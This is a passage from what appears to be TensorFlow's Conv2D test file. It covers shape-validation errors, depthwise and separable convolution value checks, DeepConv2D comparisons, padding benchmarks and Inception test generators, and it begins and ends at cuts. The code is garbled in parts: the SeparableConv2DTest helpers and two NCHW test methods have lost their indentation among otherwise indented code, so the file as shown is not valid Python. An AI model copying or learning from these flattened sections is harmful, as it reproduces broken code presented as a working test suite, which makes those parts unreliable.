    # All shapes unknown.
    c1 = nn_ops.conv2d(
        array_ops.placeholder(dtypes.float32),
        array_ops.placeholder(dtypes.float32),
        strides=[1, 1, 1, 1],
        padding="SAME")
    self.assertEqual([None, None, None, None], c1.get_shape().as_list())
    # Incorrect input shape.
    with self.assertRaises(ValueError):
      nn_ops.conv2d(
          array_ops.placeholder(
              dtypes.float32, shape=[1, 3]),
          array_ops.placeholder(dtypes.float32),
          strides=[1, 1, 1, 1],
          padding="SAME")
    # Incorrect filter shape.
    with self.assertRaises(ValueError):
      nn_ops.conv2d(
          array_ops.placeholder(dtypes.float32),
          array_ops.placeholder(
              dtypes.float32, shape=[1, 3]),
          strides=[1, 1, 1, 1],
          padding="SAME")
    # Depth mismatch.
    with self.assertRaises(ValueError):
      nn_ops.conv2d(
          array_ops.placeholder(
              dtypes.float32, shape=[32, 20, 20, 3]),
          array_ops.placeholder(
              dtypes.float32, shape=[4, 4, 2, 2]),
          strides=[1, 1, 1, 1],
          padding="SAME")
    # Input depth divisible by filter depth (group convolution).
    # No exceptions should appear.
    nn_ops.conv2d(
        array_ops.placeholder(dtypes.float32, shape=[32, 20, 20, 8]),
        array_ops.placeholder(dtypes.float32, shape=[4, 4, 2, 16]),
        strides=[1, 1, 1, 1],
        padding="SAME")
    # Negative padding.
    with self.assertRaises(ValueError):
      nn_ops.conv2d(
          array_ops.placeholder(dtypes.float32),
          array_ops.placeholder(dtypes.float32),
          strides=[1, 1, 1, 1],
          padding=[[0, 0], [0, -1], [1, 2], [0, 0]])
    # Nonzero padding in nonspatial dimension.
    with self.assertRaises(ValueError):
      nn_ops.conv2d(
          array_ops.placeholder(dtypes.float32),
          array_ops.placeholder(dtypes.float32),
          strides=[1, 1, 1, 1],
          padding=[[1, 0], [0, 0], [0, 0], [0, 0]])
    # Nonzero NCHW padding in nonspatial dimension.
    with self.assertRaises(ValueError):
      nn_ops.conv2d(
          array_ops.placeholder(dtypes.float32),
          array_ops.placeholder(dtypes.float32),
          strides=[1, 1, 1, 1],
          padding=[[0, 0], [0, 1], [0, 0], [0, 0]],
          data_format="NCHW")
    # Wrong amount of padding
    with self.assertRaises(ValueError):
      nn_ops.conv2d(
          array_ops.placeholder(dtypes.float32),
          array_ops.placeholder(dtypes.float32),
          strides=[1, 1, 1, 1],
          padding=[[0, 0], [0, 0], [0, 0]])
    # Only specify one padding amount per dimension
    with self.assertRaises(ValueError):
      nn_ops.conv2d(
          array_ops.placeholder(dtypes.float32),
          array_ops.placeholder(dtypes.float32),
          strides=[1, 1, 1, 1],
          padding=[[0], [0], [0], [0]])
    # Explicit padding elements are not lists
    with self.assertRaises(ValueError):
      nn_ops.conv2d(
          array_ops.placeholder(dtypes.float32),
          array_ops.placeholder(dtypes.float32),
          strides=[1, 1, 1, 1],
          padding=[0, 0, 0, 0])
  @test_util.deprecated_graph_mode_only
  def testOpEdgeCases(self):
    """Verifies runtime errors: batch/depth strides, filters larger than the (padded) input, and negative explicit padding during backprop."""
    with self.cached_session() as sess:
      # Illegal strides.
      with self.assertRaisesRegex(errors_impl.UnimplementedError,
                                  "strides in the batch and depth"):
        input_placeholder = array_ops.placeholder(dtypes.float32)
        input_val = np.ones([10, 10])
        filter_placeholder = array_ops.placeholder(dtypes.float32)
        filter_val = np.ones([10, 10])
        sess.run(
            nn_ops.conv2d(
                input_placeholder,
                filter_placeholder,
                strides=[2, 1, 1, 1],
                padding="SAME"),
            feed_dict={
                input_placeholder: input_val,
                filter_placeholder: filter_val
            })
      with self.assertRaisesRegex(errors_impl.UnimplementedError,
                                  "strides in the batch and depth"):
        input_placeholder = array_ops.placeholder(dtypes.float32)
        filter_placeholder = array_ops.placeholder(dtypes.float32)
        input_val = np.ones([10, 10])
        filter_val = np.ones([10, 10])
        sess.run(
            nn_ops.conv2d(
                input_placeholder,
                filter_placeholder,
                strides=[1, 1, 1, 2],
                padding="SAME"),
            feed_dict={
                input_placeholder: input_val,
                filter_placeholder: filter_val
            })
      # Filter larger than input.
      with self.assertRaisesRegex(ValueError, "Negative dimension size"):
        input_placeholder = array_ops.placeholder(
            dtypes.float32, shape=[32, 20, 20, 3])
        input_val = np.ones([32, 20, 20, 3])
        filter_placeholder = array_ops.placeholder(
            dtypes.float32, shape=[20, 21, 3, 2])
        filter_val = np.ones([20, 21, 3, 2])
        sess.run(
            nn_ops.conv2d(
                input_placeholder,
                filter_placeholder,
                strides=[1, 1, 1, 1],
                padding="VALID"),
            feed_dict={
                input_placeholder: input_val,
                filter_placeholder: filter_val
            })
      with self.assertRaisesRegex(ValueError, "Negative dimension size"):
        input_placeholder = array_ops.placeholder(
            dtypes.float32, shape=[32, 20, 20, 3])
        input_val = np.ones([32, 20, 20, 3])
        filter_placeholder = array_ops.placeholder(
            dtypes.float32, shape=[21, 20, 3, 2])
        filter_val = np.ones([21, 20, 3, 2])
        sess.run(
            nn_ops.conv2d(
                input_placeholder,
                filter_placeholder,
                strides=[1, 1, 1, 1],
                padding="VALID"),
            feed_dict={
                input_placeholder: input_val,
                filter_placeholder: filter_val
            })
      # Filter larger than input + padding.
      with self.assertRaisesRegex(ValueError, "Negative dimension size"):
        input_placeholder = array_ops.placeholder(
            dtypes.float32, shape=[32, 20, 20, 3])
        input_val = np.ones([32, 20, 20, 3])
        filter_placeholder = array_ops.placeholder(
            dtypes.float32, shape=[24, 25, 3, 2])
        filter_val = np.ones([24, 25, 3, 2])
        sess.run(
            nn_ops.conv2d(
                input_placeholder,
                filter_placeholder,
                strides=[1, 1, 1, 1],
                padding=[[0, 0], [2, 2], [2, 2], [0, 0]]),
            feed_dict={
                input_placeholder: input_val,
                filter_placeholder: filter_val
            })
      # Negative padding during backprop.
      with self.assertRaisesRegex(
          errors_impl.InvalidArgumentError,
          "All elements of explicit_paddings must be nonnegative"):
        filter_placeholder = array_ops.placeholder(
            dtypes.float32, shape=[18, 18, 3, 2])
        filter_val = np.ones([18, 18, 3, 2])
        out_backprop = array_ops.placeholder(
            dtypes.float32, shape=[32, 3, 2, 2])
        out_backprop_val = np.ones([32, 3, 2, 2])
        sess.run(
            nn_ops.conv2d_backprop_input([32, 20, 20, 3],
                                         filter_placeholder,
                                         out_backprop,
                                         strides=[1, 1, 1, 1],
                                         padding=[[0, 0], [-1, 0], [0, 0],
                                                  [0, 0]]),
            feed_dict={
                filter_placeholder: filter_val,
                out_backprop: out_backprop_val
            })
      with self.assertRaisesRegex(
          errors_impl.InvalidArgumentError,
          "All elements of explicit_paddings must be nonnegative"):
        input_placeholder = array_ops.placeholder(
            dtypes.float32, shape=[32, 20, 20, 3])
        input_val = np.ones([32, 20, 20, 3])
        out_backprop = array_ops.placeholder(
            dtypes.float32, shape=[32, 3, 2, 2])
        out_backprop_val = np.ones([32, 3, 2, 2])
        sess.run(
            nn_ops.conv2d_backprop_filter(
                input_placeholder, [18, 18, 3, 2],
                out_backprop,
                strides=[1, 1, 1, 1],
                padding=[[0, 0], [-1, 0], [0, 0], [0, 0]]),
            feed_dict={
                input_placeholder: input_val,
                out_backprop: out_backprop_val
            })
class DepthwiseConv2DTest(test.TestCase):
  """Value tests for nn_impl.depthwise_conv2d."""

  def _VerifyValues(self, tensor_in_sizes, filter_in_sizes, stride, padding,
                    expected):
    """Verifies the output values of the convolution function.

    Args:
      tensor_in_sizes: Input tensor dimensions in
        [batch, input_rows, input_cols, input_depth].
      filter_in_sizes: Filter tensor dimensions in
        [filter_rows, filter_cols, input_depth, depth_multiplier].
      stride: Stride.
      padding: Padding type.
      expected: An array containing the expected operation outputs.
    """
    total_size_1 = 1
    total_size_2 = 1
    for s in tensor_in_sizes:
      total_size_1 *= s
    for s in filter_in_sizes:
      total_size_2 *= s
    # Initializes the input tensor with array containing incrementing
    # numbers from 1.
    x1 = [f * 1.0 for f in range(1, total_size_1 + 1)]
    x2 = [f * 1.0 for f in range(1, total_size_2 + 1)]
    # Note: the session object itself is not needed; the result is fetched
    # via self.evaluate, so the previous `as sess` binding was unused.
    with self.cached_session():
      t1 = constant_op.constant(x1, shape=tensor_in_sizes)
      t1.set_shape(tensor_in_sizes)
      t2 = constant_op.constant(x2, shape=filter_in_sizes)
      conv = nn_impl.depthwise_conv2d(
          t1, t2, strides=[1, stride, stride, 1], padding=padding)
      value = self.evaluate(conv)
      tf_logging.debug("value = %s", value)
      self.assertArrayNear(expected, np.ravel(value), 1e-5)
      self.assertShapeEqual(value, conv)

  def testConv2D2x2Filter(self):
    """Checks a hand-computed 2x2 depthwise convolution."""
    # The inputs look like this (it's a 3 x 2 matrix, each of depth 2):
    #
    # [ (1.0, 2.0), (3.0, 4.0), ( 5.0, 6.0) ]
    # [ (7.0, 8.0), (9.0, 10.0), (11.0, 12.0) ]
    # We can view this as two inputs
    #
    # input depth 0:
    #
    # [ 1.0, 3.0, 5.0 ]
    # [ 7.0, 9.0, 11.0 ]
    #
    # input depth 1:
    #
    # [ 2.0, 4.0, 6.0 ]
    # [ 8.0, 10.0, 12.0 ]
    #
    # The filter looks like this (it has two 2 x 2 patches, each generating 2
    # depths):
    #
    # filter #0:
    #
    # [ (1.0, 3.0), ( 5.0, 7.0)]
    # [ (9.0, 11.0), (13.0, 15.0)]
    #
    # filter #1:
    #
    # [ ( 2.0, 4.0), ( 6.0, 8.0)]
    # [ (10.0, 12.0), (14.0, 16.0)]
    #
    # So the outputs are:
    #
    # (position 0, 0: in_depth 0, output_depth 0 -- using filter #0)
    # 1.0 * 1.0 + 7.0 * 9.0 + 3.0 * 5.0 + 9.0 * 13.0 = 196
    # (position 0, 0: in_depth 0, output_depth 1 -- using filter #1)
    # 1.0 * 2.0 + 7.0 * 10.0 + 3.0 * 6.0 + 9.0 * 14.0 = 216
    # (position 0, 0: in_depth 1, output_depth 2 -- using filter #0)
    # 2.0 * 3.0 + 8.0 * 11.0 + 4.0 * 7.0 + 10.0 * 15.0 = 272
    # (position 0, 0: in_depth 1, output_depth 3 -- using filter #1)
    # 2.0 * 4.0 + 8.0 * 12.0 + 4.0 * 8.0 + 10.0 * 16.0 = 296
    #
    # (position 1, 0: in_depth 0, output_depth 0 -- using filter #0)
    # 3.0 * 1.0 + 9.0 * 9.0 + 5.0 * 5.0 + 11.0 * 13.0 = 252
    # (position 1, 0: in_depth 0, output_depth 1 -- using filter #1)
    # 3.0 * 2.0 + 9.0 * 10.0 + 5.0 * 6.0 + 11.0 * 14.0 = 280
    # (position 1, 0: in_depth 1, output_depth 2 -- using filter #0)
    # 4.0 * 3.0 + 10.0 * 11.0 + 6.0 * 7.0 + 12.0 * 15.0 = 344
    # (position 1, 0: in_depth 1, output_depth 3 -- using filter #1)
    # 4.0 * 4.0 + 10.0 * 12.0 + 6.0 * 8.0 + 12.0 * 16.0 = 376
    expected_output = [196, 216, 272, 296, 252, 280, 344, 376]
    self._VerifyValues(
        tensor_in_sizes=[1, 2, 3, 2],
        filter_in_sizes=[2, 2, 2, 2],
        stride=1,
        padding="VALID",
        expected=expected_output)
class SeparableConv2DTest(test.TestCase):
def _InitValues(self, sizes):
"""Initializes values for input tensors.
Args:
sizes: Tensor dimensions.
Returns:
Tensor initialized to values.
"""
total_size = 1
for s in sizes:
total_size *= s
x = [f * 0.5 for f in range(1, total_size + 1)]
return constant_op.constant(x, shape=sizes)
def _VerifyValues(self,
tensor_in_sizes,
depthwise_filter_in_sizes,
pointwise_filter_in_sizes,
stride,
padding,
expected,
data_format="NHWC"):
"""Verifies the output values of the separable convolution function.
Args:
tensor_in_sizes: Input tensor dimensions.
depthwise_filter_in_sizes: Depthwise filter tensor dimensions.
pointwise_filter_in_sizes: Pointwise filter tensor dimensions.
stride: Stride.
padding: Padding type.
expected: An array containing the expected operation outputs.
data_format: string data format for input tensor.
"""
with self.cached_session(use_gpu=True) as sess:
t1 = self._InitValues(tensor_in_sizes)
f1 = self._InitValues(depthwise_filter_in_sizes)
f1.set_shape(depthwise_filter_in_sizes)
f2 = self._InitValues(pointwise_filter_in_sizes)
real_t1 = t1
strides = [1, stride, stride, 1]
if data_format == "NCHW":
real_t1 = array_ops.transpose(t1, [0, 3, 1, 2])
strides = [1, 1, stride, stride]
if isinstance(padding, list):
padding = [padding[0], padding[3], padding[1], padding[2]]
conv = nn_impl.separable_conv2d(
real_t1,
f1,
f2,
strides=strides,
padding=padding,
data_format=data_format)
if data_format == "NCHW":
conv = array_ops.transpose(conv, [0, 2, 3, 1])
value = self.evaluate(conv)
tf_logging.debug("value = %s", value)
self.assertArrayNear(expected, np.ravel(value), 2e-3)
self.assertShapeEqual(value, conv)
  def _testSeparableConv2D(self, data_format):
    """Runs the separable conv2d value check with unequal in/out depths."""
    # The output is the result of two convolutions:
    # First with tensor_in[1, 4, 4, 2] * filter1[2, 2, 2, 3].
    # Second with intermediate_out[1, 4, 4, 6] * filter2[1, 1, 6, 7].
    # Complexity is O(2*3*2*2 + 6*7*1*1) as opposed to O(2*7*2*2).
    expected_output = [
        6644.5, 6971.5, 7298.5, 7625.5, 7952.5, 8279.5, 8606.5, 8154.5, 8556.5,
        8958.5, 9360.5, 9762.5, 10164.5, 10566.5, 9664.5, 10141.5, 10618.5,
        11095.5, 11572.5, 12049.5, 12526.5, 4145.5, 4346.5, 4547.5, 4748.5,
        4949.5, 5150.5, 5351.5, 12684.5, 13311.5, 13938.5, 14565.5, 15192.5,
        15819.5, 16446.5, 14194.5, 14896.5, 15598.5, 16300.5, 17002.5, 17704.5,
        18406.5, 15704.5, 16481.5, 17258.5, 18035.5, 18812.5, 19589.5, 20366.5,
        6499.5, 6814.5, 7129.5, 7444.5, 7759.5, 8074.5, 8389.5, 18724.5,
        19651.5, 20578.5, 21505.5, 22432.5, 23359.5, 24286.5, 20234.5, 21236.5,
        22238.5, 23240.5, 24242.5, 25244.5, 26246.5, 21744.5, 22821.5, 23898.5,
        24975.5, 26052.5, 27129.5, 28206.5, 8853.5, 9282.5, 9711.5, 10140.5,
        10569.5, 10998.5, 11427.5, 5746.75, 6010.75, 6274.75, 6538.75, 6802.75,
        7066.75, 7330.75, 6168.75, 6452.25, 6735.75, 7019.25, 7302.75, 7586.25,
        7869.75, 6590.75, 6893.75, 7196.75, 7499.75, 7802.75, 8105.75, 8408.75,
        2036.25, 2119.5, 2202.75, 2286.0, 2369.25, 2452.5, 2535.75
    ]
    self._VerifyValues(
        tensor_in_sizes=[1, 4, 4, 2],
        depthwise_filter_in_sizes=[2, 2, 2, 3],
        pointwise_filter_in_sizes=[1, 1, 6, 7],
        stride=1,
        padding="SAME",
        expected=expected_output,
        data_format=data_format)
  def testSeparableConv2D(self):
    """Separable conv with NHWC layout."""
    self._testSeparableConv2D("NHWC")
  # NOTE: the "disabled" prefix keeps the test runner from picking this up
  # as a test method; the NCHW variant is intentionally not run.
  def disabledtestSeparableConv2DNCHW(self):
    """Separable conv with NCHW layout (GPU only; currently disabled)."""
    if not test.is_gpu_available():
      return
    self._testSeparableConv2D("NCHW")
  def _testSeparableConv2DEqualInputOutputDepth(self, data_format):
    """Runs separable_conv2d where input depth equals output depth.

    Args:
      data_format: "NHWC" or "NCHW"; forwarded to _VerifyValues.
    """
    # The output is the result of two convolutions:
    # First with tensor_in[1, 4, 4, 2] * filter1[2, 2, 3, 3].
    # Second with intermediate_out[1, 4, 4, 6] * filter2[1, 1, 6, 6].
    # Complexity is O(2*3*2*2 + 6*6*1*1) as opposed to O(2*6*2*2).
    expected_output = [
        5742.0, 6069.0, 6396.0, 6723.0, 7050.0, 7377.0, 7047.0, 7449.0, 7851.0,
        8253.0, 8655.0, 9057.0, 8352.0, 8829.0, 9306.0, 9783.0, 10260.0,
        10737.0, 3582.0, 3783.0, 3984.0, 4185.0, 4386.0, 4587.0, 10962.0,
        11589.0, 12216.0, 12843.0, 13470.0, 14097.0, 12267.0, 12969.0, 13671.0,
        14373.0, 15075.0, 15777.0, 13572.0, 14349.0, 15126.0, 15903.0, 16680.0,
        17457.0, 5616.0, 5931.0, 6246.0, 6561.0, 6876.0, 7191.0, 16182.0,
        17109.0, 18036.0, 18963.0, 19890.0, 20817.0, 17487.0, 18489.0, 19491.0,
        20493.0, 21495.0, 22497.0, 18792.0, 19869.0, 20946.0, 22023.0, 23100.0,
        24177.0, 7650.0, 8079.0, 8508.0, 8937.0, 9366.0, 9795.0, 4963.5, 5227.5,
        5491.5, 5755.5, 6019.5, 6283.5, 5328.0, 5611.5, 5895.0, 6178.5, 6462.0,
        6745.5, 5692.5, 5995.5, 6298.5, 6601.5, 6904.5, 7207.5, 1757.25, 1840.5,
        1923.75, 2007.0, 2090.25, 2173.5
    ]

    self._VerifyValues(
        tensor_in_sizes=[1, 4, 4, 2],
        depthwise_filter_in_sizes=[2, 2, 2, 3],
        pointwise_filter_in_sizes=[1, 1, 6, 6],
        stride=1,
        padding="SAME",
        expected=expected_output,
        data_format=data_format)
  @test_util.deprecated_graph_mode_only
  def testSeparableConv2DEqualInputOutputDepth(self):
    """Equal input/output depth separable conv with NHWC layout."""
    self._testSeparableConv2DEqualInputOutputDepth("NHWC")
def testSeparableConv2DEqualInputOutputDepthNCHW(self):
if not test.is_gpu_available():
return
self._testSeparableConv2DEqualInputOutputDepth("NCHW")
  def _testSeparableConv2dExplicitPadding(self, data_format):
    """Checks explicit padding against manual pre-padding + VALID conv.

    Computes the reference output by padding the input with array_ops.pad and
    running separable_conv2d with "VALID" padding, then verifies that passing
    the same padding list directly produces identical values.

    Args:
      data_format: "NHWC" or "NCHW"; forwarded to _VerifyValues.
    """
    tensor_in_sizes = [1, 4, 4, 2]
    depthwise_filter_in_sizes = [2, 2, 2, 3]
    pointwise_filter_in_sizes = [1, 1, 6, 7]
    padding = [[0, 0], [1, 2], [3, 4], [0, 0]]
    with self.cached_session(use_gpu=True):
      # Compute the 'expected' values by manually padding before calling
      # separable_conv2d
      t1 = self._InitValues(tensor_in_sizes)
      t1 = array_ops.pad(t1, padding)
      f1 = self._InitValues(depthwise_filter_in_sizes)
      f1.set_shape(depthwise_filter_in_sizes)
      f2 = self._InitValues(pointwise_filter_in_sizes)
      conv = nn_impl.separable_conv2d(
          t1,
          f1,
          f2,
          strides=[1, 1, 1, 1],
          padding="VALID",
          data_format="NHWC")
      expected = self.evaluate(conv)
      expected = np.ravel(expected)
    self._VerifyValues(
        tensor_in_sizes=tensor_in_sizes,
        depthwise_filter_in_sizes=depthwise_filter_in_sizes,
        pointwise_filter_in_sizes=pointwise_filter_in_sizes,
        stride=1,
        padding=padding,
        expected=expected,
        data_format=data_format)
  def testSeparableConv2dExplicitPadding(self):
    """Explicit-padding separable conv with NHWC layout."""
    self._testSeparableConv2dExplicitPadding("NHWC")
def testSeparableConv2dExplicitPaddingNCHW(self):
if not test.is_gpu_available():
return
self._testSeparableConv2dExplicitPadding("NCHW")
class DeepConv2DTest(test.TestCase):
  """Checks that the DeepConv2D path matches the regular Conv2D path."""

  def _CompareFwdConv2D(self, tensor_in_sizes, filter_in_sizes, conv_strides,
                        padding):
    """Verifies that DeepConv2D and Conv2D produce the same values.

    Args:
      tensor_in_sizes: Input tensor dimensions in
        [batch, input_rows, input_cols, input_depth].
      filter_in_sizes: Filter tensor dimensions in
        [kernel_rows, kernel_cols, input_depth, output_depth].
      conv_strides: [row_stride, col_stride] for the convolution;
      padding: Padding type.
    """
    x1 = np.random.rand(*tensor_in_sizes).astype(np.float32)
    x2 = np.random.rand(*filter_in_sizes).astype(np.float32)

    with self.cached_session(use_gpu=False) as sess:
      t1 = constant_op.constant(x1, shape=tensor_in_sizes)
      t2 = constant_op.constant(x2, shape=filter_in_sizes)
      strides = [1] + conv_strides + [1]

      conv = nn_ops.conv2d(t1, t2, strides=strides, padding=padding)

      # BUGFIX: the original left TF_USE_DEEP_CONV2D set to "1" on exit,
      # leaking the setting into every test that runs later in this process.
      # Save the caller's value and restore it when done.
      saved = os.environ.get("TF_USE_DEEP_CONV2D")
      try:
        # Evaluate once with the deep-conv path disabled, once enabled.
        os.environ["TF_USE_DEEP_CONV2D"] = "0"
        values_expect = self.evaluate([conv])

        os.environ["TF_USE_DEEP_CONV2D"] = "1"
        values_test = self.evaluate([conv])
      finally:
        if saved is None:
          del os.environ["TF_USE_DEEP_CONV2D"]
        else:
          os.environ["TF_USE_DEEP_CONV2D"] = saved

      self.assertAllClose(values_expect, values_test, rtol=1e-5, atol=1e-5)

  def _RunTestCases(self, conv_strides, padding):
    """Runs _CompareFwdConv2D over a fixed set of input/filter shapes."""
    input_sizes = [[5, 5, 5, 1248], [3, 17, 17, 192], [2, 35, 35, 288],
                   [2, 6, 8, 517], [2, 7, 4, 81], [3, 11, 3, 77]]
    filter_sizes = [[3, 3, 1248, 128], [3, 3, 192, 192], [3, 3, 288, 384],
                    [3, 3, 517, 64], [3, 3, 81, 77], [3, 3, 77, 181]]
    for input_shape, filter_shape in zip(input_sizes, filter_sizes):
      self._CompareFwdConv2D(input_shape, filter_shape, conv_strides, padding)

  def testConv2D3x3FilterStride1x1Valid(self):
    """3x3 filter, stride 1, VALID padding."""
    self._RunTestCases([1, 1], "VALID")

  def testConv2D3x3FilterStride1x1Same(self):
    """3x3 filter, stride 1, SAME padding."""
    self._RunTestCases([1, 1], "SAME")
class Conv2DBenchmark(test.Benchmark):
  """Benchmarks for Conv2D forward/backward passes and padding variants."""

  def benchmarkGPUConvStackFirst(self):
    """Times individual session.run calls on a deep stack of 1-D convs."""
    # Benchmark the first iteration of a conv-net with many identical conv
    # operations.
    if not test.is_gpu_available():
      return

    with ops.Graph().as_default(), session_lib.Session() as session:
      batch_size = 1
      timesteps = 600
      features = 1

      inputs = random_ops.random_uniform(
          [batch_size, 1, timesteps, features], seed=1234)
      # 40 wide layers followed by a single-channel output layer.
      num_outputs_list = [512] * 40 + [1]
      kernel_w = 3
      x = inputs
      for num_outputs in num_outputs_list:
        x = convolutional.conv2d(x, num_outputs, [1, kernel_w])
      outputs = x

      self.evaluate(variables.global_variables_initializer())
      num_iterations = 4
      # Each iteration is reported separately so the (slower) first run that
      # includes autotuning/setup cost is visible.
      for iter_index in xrange(num_iterations):
        start = time.time()
        session.run(outputs)
        wall_time = time.time() - start
        self.report_benchmark(
            name="conv_stack_iter_%d" % iter_index, wall_time=wall_time)
        tf_logging.info("conv_stack_iter_%d: %.4f" % (iter_index, wall_time))

  def _bench_op(self, name, op, burn_iters, num_iters):
    """Benchmarks a single op under a Grappler-restricted session.

    Args:
      name: Benchmark name to report.
      op: The op (or tensor) to run.
      burn_iters: Warm-up iterations excluded from timing.
      num_iters: Minimum number of timed iterations.
    """
    config = config_pb2.ConfigProto()
    # Prevent Grappler from optimizing away the entire graph.
    config.graph_options.rewrite_options.dependency_optimization = (
        rewriter_config_pb2.RewriterConfig.OFF)
    with session_lib.Session(config=config) as session:
      self.evaluate(variables.global_variables_initializer())
      self.run_op_benchmark(
          session, op, burn_iters=burn_iters, min_iters=num_iters, name=name)

  def benchmarkExplicitVsManualPadding(self):
    """Compare performance of EXPLICIT padding and calling tf.pad.

    A Conv2D op with EXPLICIT padding is benchmarked, and a tf.pad with the same
    padding followed by an equivalent Conv2D op is benchmarked.
    """
    if not test.is_gpu_available():
      return

    with ops.Graph().as_default():
      burn_iters = 15
      num_iters = 300
      batch_size = 64
      # The input and filter correspond to the first layer of Resnet50.
      input = variables.Variable(  # pylint: disable=redefined-builtin
          random_ops.random_uniform([
              batch_size,
              3,
              224,
              224
          ]))
      filter = variables.Variable(random_ops.random_uniform([7, 7, 3, 64]))  # pylint: disable=redefined-builtin
      strides = [1, 1, 2, 2]
      padding = [(0, 0), (0, 0), (3, 3), (3, 3)]
      output_explicit_pad = nn_ops.conv2d(
          input, filter, strides, padding=padding, data_format="NCHW")
      input_padded = array_ops.pad(input, padding)
      output_manual_pad = nn_ops.conv2d(
          input_padded, filter, strides, padding="VALID", data_format="NCHW")
      # Benchmark just the forward pass.
      self._bench_op("explicit_pad_forward", output_explicit_pad.op, burn_iters,
                     num_iters)
      self._bench_op("manual_pad_forward", output_manual_pad.op, burn_iters,
                     num_iters)

      # Benchmark both the forward and backwards passes.
      input_grad_explicit_pad, filter_grad_explicit_pad = (
          gradients_impl.gradients(output_explicit_pad, [input, filter]))
      self._bench_op(
          "explicit_pad_backward",
          control_flow_ops.group(input_grad_explicit_pad,
                                 filter_grad_explicit_pad), burn_iters,
          num_iters)
      input_grad_manual_pad, filter_grad_manual_pad = gradients_impl.gradients(
          output_manual_pad, [input, filter])
      self._bench_op(
          "manual_pad_backward",
          control_flow_ops.group(input_grad_manual_pad, filter_grad_manual_pad),
          burn_iters, num_iters)

  def benchmarkExplicitVsSamePaddingGraph(self):
    """Compare performance of EXPLICIT and SAME padding in graph mode.

    A Conv2D op with SAME padding is benchmarked, and an equivalent Conv2D op
    with explicit padding is benchmarked, where the padding is the same as in
    the SAME case. The purpose is to ensure EXPLICIT padding is just as
    efficient as the SAME case
    """
    if not test.is_gpu_available():
      return

    with ops.Graph().as_default():
      burn_iters = 15
      num_convs = 20
      num_iters = 50
      batch_size = 64
      # The input and filter correspond to a middle layer of Resnet50.
      input = variables.Variable(  # pylint: disable=redefined-builtin
          random_ops.random_uniform([
              batch_size,
              256,
              14,
              14
          ]))
      filter = variables.Variable(random_ops.random_uniform([3, 3, 256, 256]))  # pylint: disable=redefined-builtin
      strides = [1, 1, 1, 1]
      padding = [(0, 0), (0, 0), (1, 1), (1, 1)]
      output_explicit_pad = input
      output_same_pad = input
      # Chain num_convs convolutions so per-op overhead is amortized.
      for _ in range(num_convs):
        output_explicit_pad = nn_ops.conv2d(
            output_explicit_pad,
            filter,
            strides,
            padding=padding,
            data_format="NCHW")
        output_same_pad = nn_ops.conv2d(
            output_same_pad,
            filter,
            strides,
            padding="SAME",
            data_format="NCHW")
      grad_explicit_pad, = gradients_impl.gradients(output_explicit_pad, filter)
      grad_same_pad, = gradients_impl.gradients(output_same_pad, filter)
      self._bench_op("graph_explicit_pad", grad_explicit_pad.op, burn_iters,
                     num_iters)
      self._bench_op("graph_same_pad", grad_same_pad.op, burn_iters, num_iters)

  def benchmarkExplicitVsSamePaddingEager(self):
    """Compare performance of EXPLICIT and SAME padding in eager mode.

    A Conv2D op with SAME padding is benchmarked, and an equivalent Conv2D op
    with explicit padding is benchmarked, where the padding is the same as in
    the SAME case. Currently, EXPLICIT padding is slightly slower, due to the
    fact the Python padding list must be checked and processed before the Conv2D
    op can run.
    """
    # TODO(reedwm): Make EXPLICIT padding as fast as SAME padding.
    if not test.is_gpu_available():
      return

    with context.eager_mode():
      burn_iters = 15
      num_convs = 20
      num_iters = 50
      batch_size = 64
      # The input and filter correspond to a middle layer of Resnet50.
      input = variables.Variable(  # pylint: disable=redefined-builtin
          random_ops.random_uniform([
              batch_size,
              256,
              14,
              14
          ]))
      filter = variables.Variable(random_ops.random_uniform([3, 3, 256, 256]))  # pylint: disable=redefined-builtin
      strides = [1, 1, 1, 1]
      padding = [(0, 0), (0, 0), (1, 1), (1, 1)]
      output_explicit_pad = input
      output_same_pad = input

      # Warm-up loop: not timed.
      for _ in range(burn_iters):
        output_explicit_pad = nn_ops.conv2d(
            output_explicit_pad,
            filter,
            strides,
            padding=padding,
            data_format="NCHW")
        output_same_pad = nn_ops.conv2d(
            output_same_pad,
            filter,
            strides,
            padding="SAME",
            data_format="NCHW")

      start = time.time()
      for _ in range(num_iters):
        with backprop.GradientTape() as tape:
          for _ in range(num_convs):
            output_explicit_pad = nn_ops.conv2d(
                output_explicit_pad,
                filter,
                strides,
                padding=padding,
                data_format="NCHW")
          tape.gradient(output_explicit_pad, filter)
      end = time.time()
      self.report_benchmark(
          name="eager_explicit_pad",
          wall_time=(end - start) / num_iters,
          iters=num_iters)

      start = time.time()
      for _ in range(num_iters):
        with backprop.GradientTape() as tape:
          for _ in range(num_convs):
            output_same_pad = nn_ops.conv2d(
                output_same_pad,
                filter,
                strides,
                padding="SAME",
                data_format="NCHW")
          tape.gradient(output_same_pad, filter)
      end = time.time()
      self.report_benchmark(
          name="eager_same_pad",
          wall_time=(end - start) / num_iters,
          iters=num_iters)
def GetInceptionFwdTest(input_size, filter_size, stride, padding,
                        gpu_only=False):
  """Returns a forward-conv test method for the given Inception shape.

  The returned function is attached to Conv2DTest at module load time and
  relies on that class's _CompareFwdValues helper.
  """

  def Test(self):
    if gpu_only and not test.is_gpu_available():
      tf_logging.info("Skipping InceptionFwd %s", (input_size, filter_size,
                                                  stride, padding))
      return
    tf_logging.info("Testing InceptionFwd %s", (input_size, filter_size, stride,
                                                padding))
    self._CompareFwdValues(input_size, filter_size, [stride, stride], padding)

  return Test
def GetInceptionFwdDilatedConvTest(input_size, filter_size, stride, padding):
  """Returns a dilated-conv test method for the given Inception shape.

  The generated test only runs when stride == 1 (dilation > 1 combined with
  stride > 1 is not exercised); it relies on Conv2DTest's
  _VerifyDilatedConvValues helper.
  """

  def Test(self):
    if stride == 1:
      tf_logging.info("Testing InceptionFwd with dilations %s",
                      (input_size, filter_size, stride, padding))
      self._VerifyDilatedConvValues(
          tensor_in_sizes=input_size,
          filter_in_sizes=filter_size,
          strides=[stride, stride],
          dilations=[2, 2],
          padding=padding,
          rtol=5e-4)

  return Test
def GetInceptionBackInputTest(input_size, filter_size, output_size, stride,
                              padding,
                              gpu_only=False):
  """Returns an input-gradient test method for the given Inception shape.

  The returned function relies on Conv2DTest's _CompareBackpropInput helper.
  """

  def Test(self):
    if gpu_only and not test.is_gpu_available():
      tf_logging.info("Skipping InceptionBackInput %s",
                      (input_size, filter_size, output_size, stride, padding))
      return
    tf_logging.info("Testing InceptionBackInput %s",
                    (input_size, filter_size, output_size, stride, padding))
    self._CompareBackpropInput(input_size, filter_size, output_size,
                               [stride, stride], padding)

  return Test
def GetInceptionBackFilterTest(input_size, filter_size, output_size, strides,
                               padding, gpu_only=False):
